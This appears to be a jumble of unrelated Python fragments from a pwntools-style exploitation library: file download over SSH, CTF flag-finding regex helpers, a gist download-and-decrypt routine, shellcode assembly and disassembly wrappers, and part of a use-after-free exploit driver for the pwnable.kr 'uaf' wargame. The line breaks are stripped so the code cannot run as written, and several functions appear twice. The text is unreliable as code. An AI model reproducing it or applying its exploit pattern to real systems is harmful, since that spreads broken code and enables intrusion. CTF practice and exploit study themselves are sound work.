def _download_raw(self, remote, local): self._initialize_sftp() total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote)) total = pwn.size(int(total.split()[0])) if not self.silent: pwn.log.waitfor('Downloading %s' % remote) def update(has, _total): if not self.silent: pwn.log.status("%s/%s" % (pwn.size(has), total)) if self._supports_sftp: self._sftp.get(remote, local, update) else: dat = '' s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent=True) while s.connected(): update(len(dat), 0) dat += s.recv() pwn.write(local, dat) if not self.silent: pwn.log.succeeded()
def FlagFinder(cible, flag): # {{{ regex = flag file = cible t = pwn.read(file) c = re.findall(regex, str(t)) if not c: pwn.warn("Flag non trouvé") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def Exploit(fichier, pattern): regex = pattern file = fichier pwn.info("Opening file: {fichier}\n".format(fichier=file)) s = pwn.read(file) pwn.info("Searching for pattern: {flag}\n".format(flag=regex)) c = re.findall(regex, str(s)) if not c: pwn.warn("No flag for you my friend, check your regex") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def Online(url, pattern): regex = pattern file = url pwn.info("Opening file: {fichier}\n".format(fichier=file)) r = requests.session() s = r.get(file) s = s.content pwn.info("Search for pattern: {flag}\n".format(flag=regex)) c = re.findall(regex, str(s)) if not c: pwn.warn("No flag for you my friend, check your regex") else: for a in c: pwn.success("Yeah !!!! flag found: {result}\n".format(result=a)) pwn.warn("flag is now copied in flag.txt") pwn.write("flag.txt", a)
def _download_raw(self, remote, local): self._initialize_sftp() total, _ = self.run_simple('wc -c "$(echo %s|base64 -d)"' % pwn.b64(remote)) total = pwn.size(int(total.split()[0])) if not self.silent: pwn.log.waitfor('Downloading %s' % remote) def update(has, _total): if not self.silent: pwn.log.status("%s/%s" % (pwn.size(has), total)) if self._supports_sftp: self._sftp.get(remote, local, update) else: dat = '' s = self.run('cat "$(echo %s|base64 -d)"' % pwn.b64(remote), silent = True) while s.connected(): update(len(dat), 0) dat += s.recv() pwn.write(local, dat) if not self.silent: pwn.log.succeeded()
pwn.debug(pwn.hexdump(payload)) gdbscript = ''' # Before "delete m;" break *0x00401082 # before "m->introduce();" break *0x00400fe2 # before "new" break *0x00401020 continue ''' if pwn.args.GDB: pwn.write('/tmp/payload', payload) p = pwn.gdb.debug([exe.path, str(payload_length), '/tmp/payload'], gdbscript=gdbscript) elif pwn.args.LOCAL: pwn.write('/tmp/payload', payload) p = pwn.process([exe.path, str(payload_length), '/tmp/payload']) else: io = pwn.ssh("uaf", "pwnable.kr", 2222, "guest") io.upload_data(payload, random_file) p = io.process(["./uaf", str(payload_length), random_file]) p.recvuntil('1. use\n2. after\n3. free\n') p.sendline('3') for x in range(0, 2): p.recvuntil('1. use\n2. after\n3. free\n') p.sendline('2')
def setup(): write(filename, script) os.chmod(filename, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
req = requests.get('https://api.github.com/gists/' + identifier) except Exception as e: print('Unable to download from Github.') print(str(e)) sys.exit(1) if req.status_code != 200: print('Unable to download from github, debug information follows') print(req.text) sys.exit(1) try: data = b64d(json.loads(req.text)['files']['data']['content']) except Exception as e: print('Unpacking data from Github failed.') print(str(e)) sys.exit(1) cipher = Encryption(password) decrypted = cipher.decrypt(data) try: if filename is None: sys.stdout.write(decrypted) else: write(filename, decrypted) except Exception as e: print("Unable to write data to file '%s'" % filename) print(str(e)) sys.exit(1)
def _asm(target_arch, target_os, code_blocks, emit_asm=0, keep_tmp=False): import pwn.internal.shellcode_helper as H import os.path, tempfile, subprocess, string, shutil if target_arch == None: raise Exception('You need to set the architecture with context') tmpdir = tempfile.mkdtemp(prefix='pwn-asm-') def path(s): return os.path.join(tmpdir, s) try: magic = pwn.randoms(32, only=string.ascii_lowercase) code = [] cpp = ['cpp', '-nostdinc', '-undef', '-w'] if pwn.DEBUG: cpp += ['-D', 'DEBUG'] if target_os != None: include = os.path.join(pwn.installpath, 'pwn', 'include', target_os) cpp += ['-I', include] if target_os == 'linux': if os.path.isfile(os.path.join(include, target_arch + '.h')): cpp += ['-I', os.path.join(include, 'diet')] code += ['#include <%s.h>' % target_arch] elif target_os == 'freebsd': code += ['#include <common.h>'] code += [magic] if target_arch not in ['i386', 'amd64']: code += ['.section .shellcode,"ax"'] asm_extra = [] if target_arch == 'arm': code += ['.arm'] elif target_arch == 'thumb': code += ['.thumb'] target_arch = 'arm' elif target_arch == 'i386': code += ['bits 32'] elif target_arch == 'amd64': code += ['bits 64'] elif target_arch in ['mips', 'mipsel']: code += ['.set mips2'] code += ['.set noreorder'] if target_arch == 'mips': asm_extra += ['--EB'] else: asm_extra += ['--EL'] target_arch = 'mips' code += code_blocks code = '\n'.join(code) if target_arch in ['i386', 'amd64']: assembler = ['nasm', '-Ox'] + asm_extra objcopy = ['objcopy'] else: assembler = [ os.path.join(pwn.installpath, 'binutils', target_arch + '-as') ] + asm_extra if not os.path.isfile(assembler[0]): raise Exception( 'Could not find the gnu assembler for this architecture: %s' % target_arch) objcopy = [ os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy') ] objcopy += ['-j.shellcode', '-Obinary'] if emit_asm == 2: output = [] output += [ "/*", " Assemble with:", " %s [input] -o [input].tmp1" % ' '.join(cpp), " sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic, " %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler) ] if target_arch not in ['i386', 'amd64']: output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)] output += ["*/", "", code] return '\n'.join(output) pwn.write(path('step1'), code) _run(cpp + [path('step1'), path('step2')]) code = pwn.read(path('step2')) _code = code.split('\n' + magic + '\n') if len(_code) != 2: raise Exception("The output from cpp was weird:\n%s" % code) code = _code[1] if emit_asm == 1: output = [] if target_arch in ['i386', 'amd64']: output += [ ';; Assemble with:', ';; %s <input> -o <output>' % ' '.join(assembler) ] else: output += [ "/*", " Assemble with:", ' %s <input> -o <input>.tmp' % ' '.join(assembler), ' %s [input].tmp [output]' % ' '.join(objcopy), '*/', ] output += ["", code] return '\n'.join(output) pwn.write(path('step3'), code) _run(assembler + ['-o', path('step4'), path('step3')]) if target_arch in ['i386', 'amd64']: return pwn.read(path('step4')) # Sanity check for seeing if the output has relocations relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip() if len(relocs.split('\n')) > 1: raise Exception('There were relocations in the shellcode:\n\n%s' % relocs) _run(objcopy + [path('step4'), path('step5')]) return pwn.read(path('step5')) finally: if not keep_tmp: try: shutil.rmtree(tmpdir) except: pass
def _disasm(data, target_arch, keep_tmp=False): import os.path, tempfile, subprocess, shutil if target_arch == None: raise Exception('You need to set the architecture with context') tmpdir = tempfile.mkdtemp(prefix='pwn-disasm-') def path(s): return os.path.join(tmpdir, s) try: bfdarch = target_arch extra = ['-w', '-N', '*'] if target_arch == 'i386': bfdname = 'elf32-i386' elif target_arch == 'amd64': bfdname = 'elf64-x86-64' bfdarch = 'i386:x86-64' elif target_arch == 'arm': bfdname = 'elf32-littlearm' elif target_arch == 'thumb': bfdname = 'elf32-littlearm' bfdarch = 'arm' extra = ['--prefix-symbol=$t.'] elif target_arch == 'mips': bfdname = 'elf32-bigmips' elif target_arch == 'mipsel': bfdname = 'elf32-littlemips' elif target_arch == 'alpha': bfdname = 'elf64-alpha' elif target_arch == 'cris': bfdname = 'elf32-cris' elif target_arch == 'ia64': bfdname = 'elf64-ia64-little' bfdarch = 'ia64-elf64' elif target_arch == 'm68k': bfdname = 'elf32-m68k' elif target_arch == 'powerpc': bfdname = 'elf32-powerpc' elif target_arch == 'vax': bfdname = 'elf32-vax' if target_arch in ['i386', 'amd64']: objcopy = ['objcopy'] objdump = ['objdump', '-Mintel'] else: objcopy = [ os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy') ] objdump = [ os.path.join(pwn.installpath, 'binutils', 'promisc-objdump') ] objcopy += [ '-I', 'binary', '-O', bfdname, '-B', bfdarch, '--set-section-flags', '.data=code', '--rename-section', '.data=.text', ] objdump += ['-d'] pwn.write(path('step1'), data) _run(objcopy + extra + [path('step1'), path('step2')]) output0 = subprocess.check_output(objdump + [path('step2')]) output1 = output0.split('<.text>:\n') if len(output1) != 2: raise Exception('Something went wrong with objdump:\n\n%s' % output0) else: return output1[1].strip('\n') finally: if not keep_tmp: try: shutil.rmtree(tmpdir) except: pass
def _asm(target_arch, target_os, code_blocks, emit_asm = 0, keep_tmp = False): import pwn.internal.shellcode_helper as H import os.path, tempfile, subprocess, string, shutil if target_arch == None: raise Exception('You need to set the architecture with context') tmpdir = tempfile.mkdtemp(prefix = 'pwn-asm-') def path(s): return os.path.join(tmpdir, s) try: magic = pwn.randoms(32, only = string.ascii_lowercase) code = [] cpp = ['cpp', '-nostdinc', '-undef', '-w'] if pwn.DEBUG: cpp += ['-D', 'DEBUG'] if target_os != None: include = os.path.join(pwn.installpath, 'pwn', 'include', target_os) cpp += ['-I', include] if target_os == 'linux': if os.path.isfile(os.path.join(include, target_arch + '.h')): cpp += ['-I', os.path.join(include, 'diet')] code += ['#include <%s.h>' % target_arch] elif target_os == 'freebsd': code += ['#include <common.h>'] code += [magic] if target_arch not in ['i386', 'amd64']: code += ['.section .shellcode,"ax"'] asm_extra = [] if target_arch == 'arm': code += ['.arm'] elif target_arch == 'thumb': code += ['.thumb'] target_arch = 'arm' elif target_arch == 'i386': code += ['bits 32'] elif target_arch == 'amd64': code += ['bits 64'] elif target_arch in ['mips', 'mipsel']: code += ['.set mips2'] code += ['.set noreorder'] if target_arch == 'mips': asm_extra += ['--EB'] else: asm_extra += ['--EL'] target_arch = 'mips' code += code_blocks code = '\n'.join(code) if target_arch in ['i386', 'amd64']: assembler = ['nasm', '-Ox'] + asm_extra objcopy = ['objcopy'] else: assembler = [os.path.join(pwn.installpath, 'binutils', target_arch + '-as')] + asm_extra if not os.path.isfile(assembler[0]): raise Exception('Could not find the gnu assembler for this architecture: %s' % target_arch) objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')] objcopy += ['-j.shellcode', '-Obinary'] if emit_asm == 2: output = [] output += [ "/*", " Assemble with:", " %s [input] -o [input].tmp1" % ' '.join(cpp), " sed -e '0,/^%s$/d' [input].tmp1 > [input].tmp2" % magic, " %s [input].tmp2 -o [input].tmp3" % ' '.join(assembler) ] if target_arch not in ['i386', 'amd64']: output += [" %s [input].tmp3 [output]" % ' '.join(objcopy)] output += ["*/", "", code] return '\n'.join(output) pwn.write(path('step1'), code) _run(cpp + [path('step1'), path('step2')]) code = pwn.read(path('step2')) _code = code.split('\n' + magic + '\n') if len(_code) != 2: raise Exception("The output from cpp was weird:\n%s" % code) code = _code[1] if emit_asm == 1: output = [] if target_arch in ['i386', 'amd64']: output += [ ';; Assemble with:', ';; %s <input> -o <output>' % ' '.join(assembler) ] else: output += [ "/*", " Assemble with:", ' %s <input> -o <input>.tmp' % ' '.join(assembler), ' %s [input].tmp [output]' % ' '.join(objcopy), '*/', ] output += ["", code] return '\n'.join(output) pwn.write(path('step3'), code) _run(assembler + ['-o', path('step4'), path('step3')]) if target_arch in ['i386', 'amd64']: return pwn.read(path('step4')) # Sanity check for seeing if the output has relocations relocs = subprocess.check_output(['readelf', '-r', path('step4')]).strip() if len(relocs.split('\n')) > 1: raise Exception('There were relocations in the shellcode:\n\n%s' % relocs) _run(objcopy + [path('step4'), path('step5')]) return pwn.read(path('step5')) finally: if not keep_tmp: try: shutil.rmtree(tmpdir) except: pass
def _disasm(data, target_arch, keep_tmp = False): import os.path, tempfile, subprocess, shutil if target_arch == None: raise Exception('You need to set the architecture with context') tmpdir = tempfile.mkdtemp(prefix = 'pwn-disasm-') def path(s): return os.path.join(tmpdir, s) try: bfdarch = target_arch extra = ['-w', '-N', '*'] if target_arch == 'i386': bfdname = 'elf32-i386' elif target_arch == 'amd64': bfdname = 'elf64-x86-64' bfdarch = 'i386:x86-64' elif target_arch == 'arm': bfdname = 'elf32-littlearm' elif target_arch == 'thumb': bfdname = 'elf32-littlearm' bfdarch = 'arm' extra = ['--prefix-symbol=$t.'] elif target_arch == 'mips': bfdname = 'elf32-bigmips' elif target_arch == 'mipsel': bfdname = 'elf32-littlemips' elif target_arch == 'alpha': bfdname = 'elf64-alpha' elif target_arch == 'cris': bfdname = 'elf32-cris' elif target_arch == 'ia64': bfdname = 'elf64-ia64-little' bfdarch = 'ia64-elf64' elif target_arch == 'm68k': bfdname = 'elf32-m68k' elif target_arch == 'powerpc': bfdname = 'elf32-powerpc' elif target_arch == 'vax': bfdname = 'elf32-vax' if target_arch in ['i386', 'amd64']: objcopy = ['objcopy'] objdump = ['objdump', '-Mintel'] else: objcopy = [os.path.join(pwn.installpath, 'binutils', 'promisc-objcopy')] objdump = [os.path.join(pwn.installpath, 'binutils', 'promisc-objdump')] objcopy += ['-I', 'binary', '-O', bfdname, '-B', bfdarch, '--set-section-flags', '.data=code', '--rename-section', '.data=.text', ] objdump += ['-d'] pwn.write(path('step1'), data) _run(objcopy + extra + [path('step1'), path('step2')]) output0 = subprocess.check_output(objdump + [path('step2')]) output1 = output0.split('<.text>:\n') if len(output1) != 2: raise Exception('Something went wrong with objdump:\n\n%s' % output0) else: return output1[1].strip('\n') finally: if not keep_tmp: try: shutil.rmtree(tmpdir) except: pass